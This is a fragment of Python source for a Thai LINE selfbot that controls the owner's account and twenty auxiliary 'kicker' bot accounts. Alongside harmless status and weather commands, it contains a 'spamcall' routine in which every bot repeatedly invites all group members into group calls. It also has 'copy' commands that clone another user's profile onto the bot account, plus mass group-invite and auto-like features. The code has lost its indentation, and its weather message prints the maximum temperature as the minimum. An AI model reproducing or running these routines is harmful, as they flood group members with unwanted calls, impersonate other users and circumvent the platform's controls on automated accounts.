api = 'http://api.openweathermap.org/data/2.5/weather?id=' # Search for your city ID here: http://bulk.openweathermap.org/sample/city.list.json.gz
full_api_url = api + str(city_id) + '&mode=json&units=' + unit + '&APPID=' + user_api
return full_api_url
def data_fetch(full_api_url):
url = urllib.request.urlopen(full_api_url)
output = url.read().decode('utf-8')
raw_api_dict = json.loads(output)
url.close()
return raw_api_dict
def data_organizer(raw_api_dict):
data = dict(
city=raw_api_dict.get('name'),
country=raw_api_dict.get('sys').get('country'),
temp=raw_api_dict.get('main').get('temp'),
temp_max=raw_api_dict.get('main').get('temp_max'),
temp_min=raw_api_dict.get('main').get('temp_min'),
humidity=raw_api_dict.get('main').get('humidity'),
pressure=raw_api_dict.get('main').get('pressure'),
sky=raw_api_dict['weather'][0]['main'],
sunrise=time_converter(raw_api_dict.get('sys').get('sunrise')),
sunset=time_converter(raw_api_dict.get('sys').get('sunset')),
wind=raw_api_dict.get('wind').get('speed'),
wind_deg=raw_api_dict.get('deg'),
dt=time_converter(raw_api_dict.get('dt')),
cloudiness=raw_api_dict.get('clouds').get('all')
)
return data
def data_output(to,data,prov):
m_symbol = ' °C'
if prov == 1:
line.sendMessage(to,"สภาพอากาศ: เชียงใหม่\nอุณหภูมิ: "+str(data['temp'])+m_symbol+"\n(มากสุด: "+str(data['temp_max'])+m_symbol+", น้อยสุด: "+str(data['temp_max'])+m_symbol+")\n\nแรงลม: "+str(data['wind'])+"\nความชื้น: "+str(data['humidity'])+"\nเมฆ: "+str(data['cloudiness'])+"%\nความดัน: "+str(data['pressure'])+"\nดวงอาทิตย์ขึ้น: "+str(data['sunrise'])+"\nดวงอาทิตย์ตก: "+str(data['sunset'])+"\n\nอัพเดทล่าสุด: "+str(data['dt']))
elif prov == 2:
line.sendMessage(to,"สภาพอากาศ: อุบลราชธานี\nอุณหภูมิ: "+str(data['temp'])+m_symbol+"\n(มากสุด: "+str(data['temp_max'])+m_symbol+", น้อยสุด: "+str(data['temp_max'])+m_symbol+")\n\nแรงลม: "+str(data['wind'])+"\nความชื้น: "+str(data['humidity'])+"\nเมฆ: "+str(data['cloudiness'])+"%\nความดัน: "+str(data['pressure'])+"\nดวงอาทิตย์ขึ้น: "+str(data['sunrise'])+"\nดวงอาทิตย์ตก: "+str(data['sunset'])+"\n\nอัพเดทล่าสุด: "+str(data['dt']))
elif prov == 3:
line.sendMessage(to,"สภาพอากาศ: กรุงเทพมหานคร\nอุณหภูมิ: "+str(data['temp'])+m_symbol+"\n(มากสุด: "+str(data['temp_max'])+m_symbol+", น้อยสุด: "+str(data['temp_max'])+m_symbol+")\n\nแรงลม: "+str(data['wind'])+"\nความชื้น: "+str(data['humidity'])+"\nเมฆ: "+str(data['cloudiness'])+"%\nความดัน: "+str(data['pressure'])+"\nดวงอาทิตย์ขึ้น: "+str(data['sunrise'])+"\nดวงอาทิตย์ตก: "+str(data['sunset'])+"\n\nอัพเดทล่าสุด: "+str(data['dt']))
elif prov == 4:
line.sendMessage(to,"สภาพอากาศ: เพชรบูรณ์\nอุณหภูมิ: "+str(data['temp'])+m_symbol+"\n(มากสุด: "+str(data['temp_max'])+m_symbol+", น้อยสุด: "+str(data['temp_max'])+m_symbol+")\n\nแรงลม: "+str(data['wind'])+"\nความชื้น: "+str(data['humidity'])+"\nเมฆ: "+str(data['cloudiness'])+"%\nความดัน: "+str(data['pressure'])+"\nดวงอาทิตย์ขึ้น: "+str(data['sunrise'])+"\nดวงอาทิตย์ตก: "+str(data['sunset'])+"\n\nอัพเดทล่าสุด: "+str(data['dt']))
elif prov == 5:
line.sendMessage(to,"สภาพอากาศ: ขอนแก่น\nอุณหภูมิ: "+str(data['temp'])+m_symbol+"\n(มากสุด: "+str(data['temp_max'])+m_symbol+", น้อยสุด: "+str(data['temp_max'])+m_symbol+")\n\nแรงลม: "+str(data['wind'])+"\nความชื้น: "+str(data['humidity'])+"\nเมฆ: "+str(data['cloudiness'])+"%\nความดัน: "+str(data['pressure'])+"\nดวงอาทิตย์ขึ้น: "+str(data['sunrise'])+"\nดวงอาทิตย์ตก: "+str(data['sunset'])+"\n\nอัพเดทล่าสุด: "+str(data['dt']))
elif prov == 6:
line.sendMessage(to,"สภาพอากาศ: อยุธยา\nอุณหภูมิ: "+str(data['temp'])+m_symbol+"\n(มากสุด: "+str(data['temp_max'])+m_symbol+", น้อยสุด: "+str(data['temp_max'])+m_symbol+")\n\nแรงลม: "+str(data['wind'])+"\nความชื้น: "+str(data['humidity'])+"\nเมฆ: "+str(data['cloudiness'])+"%\nความดัน: "+str(data['pressure'])+"\nดวงอาทิตย์ขึ้น: "+str(data['sunrise'])+"\nดวงอาทิตย์ตก: "+str(data['sunset'])+"\n\nอัพเดทล่าสุด: "+str(data['dt']))
def executeCmd(msg, text, txt, cmd, msg_id, receiver, sender, to, setKey):
if cmd == 'logoutbot':
line.sendMessage(to, 'Bot will logged out')
sys.exit('##----- PROGRAM STOPPED -----##')
elif cmd == 'logoutdevicee':
line.sendMessage(to, 'Bot will logged outdevicee')
line.logout()
sys.exit('##----- line LOGOUT -----##')
elif cmd == 'รีบอท':
line.sendMessage(to, 'กำลังรี😘♪')
restartProgram()
elif cmd == 'help':
line.sendReplyMessage(msg_id,to,help(),{'AGENT_LINK': 'line://ti/p/~jamekillover','AGENT_ICON': 'http://dl.profile.line-cdn.net/'+line.getContact(myMid).pictureStatus,'AGENT_NAME': 'รัตน์'})
elif text.lower() == 'resetlogin':
os.system('clear')
line.sendReplyMessage(msg_id,to," 「 Reset Login 」\nType: Reset Login\nระบบกำลังประมวลผล...",{'AGENT_LINK': 'line://ti/p/~jamekillover','AGENT_ICON': 'http://dl.profile.line-cdn.net/'+line.getContact(myMid).pictureStatus,'AGENT_NAME': 'รัตน์'})
python = sys.executable
os.execl(python, python, * sys.argv)
elif cmd == 'helpbot':
kicker.sendReplyMessage(msg_id, to, helpbot(),contentMetadata={"MSG_SENDER_NAME":"188c17d367a9455e4b60f809f280003d867d4df7188c17d367a9455e7d4df7188c17d367a9455e188c17d367a9455e4b60f809f280003d867d4df7188c17d367a9455e7d4df7188c17d367a9455e5ee8776c4c58a0367a9455e4b60f80358c204u21d04f683a70e","MSG_SENDER_ICON":"https://media.giphy.com/media/T9qJa0lfRjXsQ/source.gif"})
elif cmd == 'speed':
start = time.time()
sendMentionxd(msg.to, sender, "「ความเร็วของคุณคือ...」 ", "")
elapsed_time = time.time() - start
line.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
elif text.lower() == 'myspeed':
time0 = timeit.timeit('"-".join(str(n) for n in range(100))', number=1000)
str1 = str(time0)
start = time.time()
line.sendMessage(to,'ความเร็วในการประมวลผล\n' + str1 + 'วินาที')
elapsed_time = time.time() - start
line.sendMessage(to,'การตอบสนองต่อคำสั่ง\n' + format(str(elapsed_time)) + 'วินาที')
elif cmd == 'me':
key1 = myMid
line.sendReplyMessage(msg_id, to, None, contentMetadata={"MSG_SENDER_NAME":"188c17d367a9455e4b60f809f280003d867d4df","MSG_SENDER_ICON":"https://media.giphy.com/media/T9qJa0lfRjXsQ/source.gif",'mid': key1}, contentType=13)
elif cmd == "me2":
line.sendReplyMessage(msg_id,to, line.getContact(sender).displayName, contentMetadata = {'previewUrl': 'https://media.giphy.com/media/T9qJa0lfRjXsQ/source.gif', 'i-installUrl': 'line://app/1602687308-GXq4Vvk9?type=profile', 'type': 'mt', 'subText': "", 'a-installUrl': 'line://app/1602687308-GXq4Vvk9?type=profile', 'a-installUrl': ' line://app/1602687308-GXq4Vvk9?type=profile', 'a-packageName': 'line://app/1602687308-GXq4Vvk9?type=profile', 'countryCode': 'line://app/1602687308-GXq4Vvk9?type=profileID', 'a-linkUri': 'line://app/1602687308-GXq4Vvk9?type=profile', 'i-linkUri': 'line://app/1602687308-GXq4Vvk9?type=profile', 'id': 'line://app/1602687308-GXq4Vvk9?type=profile', 'text': 'รัตน์ไง', 'linkUri': 'line://app/1602687308-GXq4Vvk9?type=profile'}, contentType=19)
elif cmd == 'ออน':
runtime = time.time() - programStart
line.sendMessage(to,format_timespan(runtime))
elif cmd == 'author':
line.sendMessage(to, 'Author is linepy')
elif cmd == 'me3':
line.sendReplyMessage(msg_id, to,"Fn",contentMetadata={'vCard': 'BEGIN:VCARD\r\nVERSION:3.0\r\nPRODID:ANDROID 8.13.3 Android OS 4.4.4\r\nFN:\\'+line.getContact(sender).displayName+'\nTEL;TYPE=mobile:'+line.getContact(sender).statusMessage+'\r\nN:?;\\,\r\nEND:VCARD\r\n', 'displayName': line.getContact(sender).displayName},contentType=13)
elif cmd == 'about':
try:
arr = []
owner = "ucccca2ada2b522c6d59e6640f29aafd0"
creator = line.getContact(owner)
contact = line.getContact(myMid)
grouplist = line.getGroupIdsJoined()
contactlist = line.getAllContactIds()
blockedlist = line.getBlockedContactIds()
ret_ = "____________________________\n❨✪❩ Impormation Selfbot ❨✪❩\n____________________________"
ret_ += "\n┃❨✪❩ Line Name : {}".format(contact.displayName)
ret_ += "\n┃❨✪❩ Groups : {}".format(str(len(grouplist)))
ret_ += "\n┃❨✪❩ Friends : {}".format(str(len(contactlist)))
ret_ += "\n┃❨✪❩ Blocked : {}".format(str(len(blockedlist)))
ret_ += "\n┃❨✪❩ Version1 : Python3 Update"
ret_ += "\n┃❨✪❩ Version2 : Premium server"
ret_ += "\n┃❨✪❩ Server : Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-33-generic x86_64)"
ret_ += "\n┃❨✪❩ Edit : 14-11-2018"
ret_ += "\n┃❨✪❩ Creator : {}".format(creator.displayName)
ret_ += "\n____________________________"
line.sendMessage(to, str(ret_))
except Exception as e:
line.sendMessage(msg.to, str(e))
elif cmd == 'status':
res = '╭───「 Status 」'
res += '\n├ Auto Add : ' + bool_dict[settings['autoAdd']['status']][1]
res += '\n├ Auto Join : ' + bool_dict[settings['autoJoin']['status']][1]
res += '\n├ Auto Respond : ' + bool_dict[settings['autoRespond']['status']][1]
res += '\n├ Auto Respond Mention : ' + bool_dict[settings['autoRespondMention']['status']][1]
res += '\n├ Auto Read : ' + bool_dict[settings['autoRead']][1]
res += '\n├ Setting Key : ' + bool_dict[settings['setKey']['status']][1]
res += '\n├ Mimic : ' + bool_dict[settings['mimic']['status']][1]
res += '\n├ Greetings Join : ' + bool_dict[settings['greet']['join']['status']][1]
res += '\n├ Greetings Leave : ' + bool_dict[settings['greet']['leave']['status']][1]
res += '\n├ Check Contact : ' + bool_dict[settings['checkContact']][1]
res += '\n├ Check Post : ' + bool_dict[settings['checkPost']][1]
res += '\n├ Check Sticker : ' + bool_dict[settings['checkSticker']][1]
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
elif cmd == 'abort':
aborted = False
if to in settings['changeGroupPicture']:
settings['changeGroupPicture'].remove(to)
line.sendMessage(to, 'ยกเลิกเปลี่ยนรูปภาพกลุ่มเรียบร้อย')
aborted = True
if settings['changePictureProfile']:
settings['changePictureProfile'] = False
line.sendMessage(to, 'ยกเลิกเปลี่ยนรูปภาพโปรไฟล์เรียบร้อย')
aborted = True
if settings['changeCoverProfile']:
settings['changeCoverProfile'] = False
line.sendMessage(to, 'ยกเลิกเปลี่ยนรูปปกเรียบร้อย')
aborted = True
if not aborted:
line.sendMessage(to, 'ไม่สามารถยกเลิกได้\nไม่มีอะไรไห้ยกเลิก')
elif cmd.startswith("midcopy "):
target = removeCmd("midcopy", text)
if target is not None:
cloneProfile(target)
line.sendContact(to,myMid)
line.sendMessage(to,"คัดลอกบัญชีเรียบร้อยแล้ว")
elif cmd.startswith("copy "):
if sender in myMid:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
if len(lists) != []:
ls = random.choice(lists)
cloneProfile(ls)
line.sendMessage(to,"คัดลอกบัญชีเรียบร้อยแล้ว")
elif cmd == "load":
if sender in myMid:
try:
restoreProfile()
line.sendMessage(to, "เรียกคืนสถานะบัญชีสำเร็จโปรดรอสักครู่จนกว่าโปรไฟล์จะเปลี่ยน")
except Exception as e:
line.sendMessage(to, "ไม่สามารถเรียกคืนสถานะบัญชีได้")
line.sendMessage(msg.to, str(e))
elif cmd == "save":
if sender in myMid:
try:
backupProfile()
line.sendMessage(to, "บันทึกสถานะบัญชีเรียบร้อยแล้ว")
except Exception as e:
line.sendMessage(to, "ไม่สามารถบันทึกสถานะบัญชีได้")
line.sendMessage(msg.to, str(e))
elif cmd == 'speed2':
start = time.time()
sendMentionxd(msg.to, sender, "「Your Test Speed Bot」 ", "")
elapse = time.time() - start
line.sendMessage(to, ' %s seconds' % str(elapse),{'AGENT_ICON': 'https://i.imgur.com/GSE9LLM.gif','AGENT_NAME': 'รัตน์','AGENT_LINK': 'line://app/1608998163-Xxzr1PmV'})
elif cmd == 'infome':
arr = []
mention = "@x\n"
text = msg.text[len("infome"):].strip()
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':myMid}
arr.append(arrData)
today = datetime.today()
future = datetime(2018,7,25)
hari = (str(future - today))
comma = hari.find(",")
hari = hari[:comma]
teman = line.getAllContactIds()
gid = line.getGroupIdsJoined()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
h = line.getContact(myMid)
line.reissueUserTicket()
My_Id = line.profile.displayName + "\nMy id Line: http://line.me/ti/p/" + line.getUserTicket().id
text += mention+"TIME : "+datetime.strftime(timeNow,'%H:%M:%S')+" Thailand\nMy Group : "+str(len(gid))+"\nMy Friend: "+str(len(teman))+"\nMy Mid : "+h.mid+"\nMy Name : "+My_Id
line.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
elif text.lower() == 'เปลี่ยนวีดีโอ':
if wait["selfbot"] == True:
if msg._from in admin:
line.sendMessage(to, "กรุณารอ20-30นาที")
picture = line.downloadFileURL("https://i.imgur.com/83Z5C2f.png", saveAs="image.png")
video = line.downloadFileURL("https://www.saveoffline.com/get/?i=eAQRQWRnY9Rs3RTdn3jZUV6sNVQkzqsJ&u=qQaKnkcoKrbhu8sr0CiqKlFxpiiOvHUX", saveAs="video.mp4")
changeVideoAndPictureProfile(picture, video)
line.sendMessage(to, "เปลี่ยนเรียบร้อย")
elif cmd == 'test':
line.sendTextWithFooter(to, "Footer message", footerIconURL="https://os.line.naver.jp/os/p/" + line.profile.mid, footerText="Footer", footerURL="https://line.me/ti/p/wprfnIo55O")
line.sendMessage(to, 'Your Test',{'AGENT_LINK': 'line://app/1608998163-Xxzr1PmV','AGENT_ICON': 'https://i.imgur.com/GSE9LLM.gif','AGENT_NAME': 'รัตน์'})
elif cmd == "เชคบอท":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention1(msg.to, sender, "「Ready」 ", "")
sendMention2(msg.to, sender, "「Ready」 ", "")
sendMention3(msg.to, sender, "「Ready」 ", "")
sendMention4(msg.to, sender, "「Ready」 ", "")
sendMention5(msg.to, sender, "「Ready」 ", "")
sendMention6(msg.to, sender, "「Ready」 ", "")
sendMention7(msg.to, sender, "「Ready」 ", "")
sendMention8(msg.to, sender, "「Ready」 ", "")
sendMention9(msg.to, sender, "「Ready」 ", "")
sendMention10(msg.to, sender, "「Ready」 ", "")
sendMention11(msg.to, sender, "「Ready」 ", "")
sendMention12(msg.to, sender, "「Ready」 ", "")
sendMention13(msg.to, sender, "「Ready」 ", "")
sendMention14(msg.to, sender, "「Ready」 ", "")
sendMention15(msg.to, sender, "「Ready」 ", "")
sendMention16(msg.to, sender, "「Ready」 ", "")
sendMention17(msg.to, sender, "「Ready」 ", "")
sendMention18(msg.to, sender, "「Ready」 ", "")
sendMention19(msg.to, sender, "「Ready」 ", "")
sendMention20(msg.to, sender, "「Ready」 ", "")
elif cmd == "ceklogin":
if wait["selfbot"] == True:
if msg._from in admin:
try:
sendMention1(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention2(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention3(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention4(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention5(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention6(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention7(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention8(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention9(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention10(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention11(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention12(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention13(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention14(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention15(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention16(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention17(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention18(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention19(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention20(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "responname":
if wait["selfbot"] == True:
if msg._from in admin:
try:
kicker.sendMessage(msg.to,responsename1)
kicker2.sendMessage(msg.to,responsename2)
kicker3.sendMessage(msg.to,responsename3)
kicker4.sendMessage(msg.to,responsename4)
kicker5.sendMessage(msg.to,responsename5)
kicker6.sendMessage(msg.to,responsename6)
kicker7.sendMessage(msg.to,responsename7)
kicker8.sendMessage(msg.to,responsename8)
kicker9.sendMessage(msg.to,responsename9)
kicker10.sendMessage(msg.to,responsename10)
kicker11.sendMessage(msg.to,responsename11)
kicker12.sendMessage(msg.to,responsename12)
kicker13.sendMessage(msg.to,responsename13)
kicker14.sendMessage(msg.to,responsename14)
kicker15.sendMessage(msg.to,responsename15)
kicker16.sendMessage(msg.to,responsename16)
kicker17.sendMessage(msg.to,responsename17)
kicker18.sendMessage(msg.to,responsename18)
kicker19.sendMessage(msg.to,responsename19)
kicker20.sendMessage(msg.to,responsename20)
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "inv":
if wait["selfbot"] == True:
if msg._from in admin:
try:
anggota = [Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid]
line.inviteIntoGroup(msg.to, anggota)
kicker.acceptGroupInvitation(msg.to)
kicker2.acceptGroupInvitation(msg.to)
kicker3.acceptGroupInvitation(msg.to)
kicker4.acceptGroupInvitation(msg.to)
kicker5.acceptGroupInvitation(msg.to)
kicker6.acceptGroupInvitation(msg.to)
kicker7.acceptGroupInvitation(msg.to)
kicker8.acceptGroupInvitation(msg.to)
kicker9.acceptGroupInvitation(msg.to)
kicker10.acceptGroupInvitation(msg.to)
kicker11.acceptGroupInvitation(msg.to)
kicker12.acceptGroupInvitation(msg.to)
kicker13.acceptGroupInvitation(msg.to)
kicker14.acceptGroupInvitation(msg.to)
kicker15.acceptGroupInvitation(msg.to)
kicker16.acceptGroupInvitation(msg.to)
kicker17.acceptGroupInvitation(msg.to)
kicker18.acceptGroupInvitation(msg.to)
kicker19.acceptGroupInvitation(msg.to)
kicker20.acceptGroupInvitation(msg.to)
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "antijs stay":
if wait["selfbot"] == True:
if msg._from in admin:
try:
ginfo = line.getGroup(msg.to)
line.inviteIntoGroup(msg.to, [g1MID])
line.sendMessage(msg.to,"Group 「"+str(ginfo.name)+"」 ทำการเปิดใช้งานโหมดป้องกันJS")
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "~~":
if wait["selfbot"] == True:
if msg._from in admin:
G = line.getGroup(msg.to)
kicker.leaveGroup(msg.to)
kicker2.leaveGroup(msg.to)
kicker3.leaveGroup(msg.to)
kicker4.leaveGroup(msg.to)
kicker5.leaveGroup(msg.to)
kicker6.leaveGroup(msg.to)
kicker7.leaveGroup(msg.to)
kicker8.leaveGroup(msg.to)
kicker9.leaveGroup(msg.to)
kicker10.leaveGroup(msg.to)
kicker11.leaveGroup(msg.to)
kicker12.leaveGroup(msg.to)
kicker13.leaveGroup(msg.to)
kicker14.leaveGroup(msg.to)
kicker15.leaveGroup(msg.to)
kicker16.leaveGroup(msg.to)
kicker17.leaveGroup(msg.to)
kicker18.leaveGroup(msg.to)
kicker19.leaveGroup(msg.to)
kicker20.leaveGroup(msg.to)
elif cmd == "kicker join":
if msg._from in admin:
G = line.getGroup(msg.to)
ginfo = line.getGroup(msg.to)
G.preventedJoinByTicket = False
line.updateGroup(G)
invsend = 0
Ticket = line.reissueGroupTicket(msg.to)
g1.acceptGroupInvitationByTicket(msg.to,Ticket)
G = g1.getGroup(msg.to)
G.preventedJoinByTicket = True
g1.updateGroup(G)
elif cmd == "kicker bye":
if msg._from in admin:
G = line.getGroup(msg.to)
g1.leaveGroup(msg.to)
elif cmd == "/k:speed":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
kicker.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker2.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker2.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker3.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker3.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker4.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker4.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker5.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker5.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker6.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker6.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker7.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker7.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker8.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker8.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker9.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker9.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker10.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker10.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker11.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker11.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker12.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker12.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker13.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker13.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker14.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker14.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker15.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker15.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker16.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker16.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker17.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker17.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker18.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker18.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker19.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker19.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker20.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker20.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
elif "spamcall" in msg.text.lower():
if msg.toType == 2:
sep = msg.text.split(" ")
resp = msg.text.replace(sep[0] + " ","")
num = int(resp)
try:
sendMention1(msg.to, sender, "「SpamCall Ready」 ", "")
except:
pass
while range(1):
group = kicker.getGroup(to)
members = [mem.mid for mem in group.members]
for var in range(num):
kicker.acquireGroupCallRoute(to)
kicker.inviteIntoGroupCall(to, contactIds=members)
kicker2.acquireGroupCallRoute(to)
kicker2.inviteIntoGroupCall(to, contactIds=members)
kicker3.acquireGroupCallRoute(to)
kicker3.inviteIntoGroupCall(to, contactIds=members)
kicker4.acquireGroupCallRoute(to)
kicker4.inviteIntoGroupCall(to, contactIds=members)
kicker5.acquireGroupCallRoute(to)
kicker5.inviteIntoGroupCall(to, contactIds=members)
kicker6.acquireGroupCallRoute(to)
kicker6.inviteIntoGroupCall(to, contactIds=members)
kicker7.acquireGroupCallRoute(to)
kicker7.inviteIntoGroupCall(to, contactIds=members)
kicker8.acquireGroupCallRoute(to)
kicker8.inviteIntoGroupCall(to, contactIds=members)
kicker9.acquireGroupCallRoute(to)
kicker9.inviteIntoGroupCall(to, contactIds=members)
kicker10.acquireGroupCallRoute(to)
kicker10.inviteIntoGroupCall(to, contactIds=members)
kicker11.acquireGroupCallRoute(to)
kicker11.inviteIntoGroupCall(to, contactIds=members)
kicker12.acquireGroupCallRoute(to)
kicker12.inviteIntoGroupCall(to, contactIds=members)
kicker13.acquireGroupCallRoute(to)
kicker13.inviteIntoGroupCall(to, contactIds=members)
kicker14.acquireGroupCallRoute(to)
kicker14.inviteIntoGroupCall(to, contactIds=members)
kicker15.acquireGroupCallRoute(to)
kicker15.inviteIntoGroupCall(to, contactIds=members)
kicker16.acquireGroupCallRoute(to)
kicker16.inviteIntoGroupCall(to, contactIds=members)
kicker17.acquireGroupCallRoute(to)
kicker17.inviteIntoGroupCall(to, contactIds=members)
kicker18.acquireGroupCallRoute(to)
kicker18.inviteIntoGroupCall(to, contactIds=members)
kicker19.acquireGroupCallRoute(to)
kicker19.inviteIntoGroupCall(to, contactIds=members)
kicker20.acquireGroupCallRoute(to)
kicker20.inviteIntoGroupCall(to, contactIds=members)
sendMention1(msg.to, sender, "「SpamCall End」 ", "")
break
else:
kicker.sendMessage(to,"คำสั่งนี้สามารถใช้ได้เฉพาะกลุ่ม")
elif 'Set autolike ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set autolike ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "เกิดข้อผิดพลาดร้ายแรง")
else:
wait["comment"] = spl
line.sendMessage(msg.to, "「Autolike」\nเปลี่ยนคอมเม้นเป็น\n「{}」".format(str(spl)))
elif text.lower() == "cek autolike":
if msg._from in admin:
line.sendMessage(msg.to, "「AutoLike」\nคอมเม้นของคุณคือ!\n「 " + str(wait["comment"]) + " 」")
elif cmd.startswith('like '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if wait['autoLike']:
line.sendMessage(to, "「AutoLike on」")
else:
wait['autoLike'] = True
line.sendMessage(to, "「AutoLike on」")
elif texttl == 'off':
if not wait['autoLike']:
line.sendMessage(to, "「AutoLike off」")
else:
wait['autoLike'] = False
line.sendMessage(to, "「AutoLike off」")
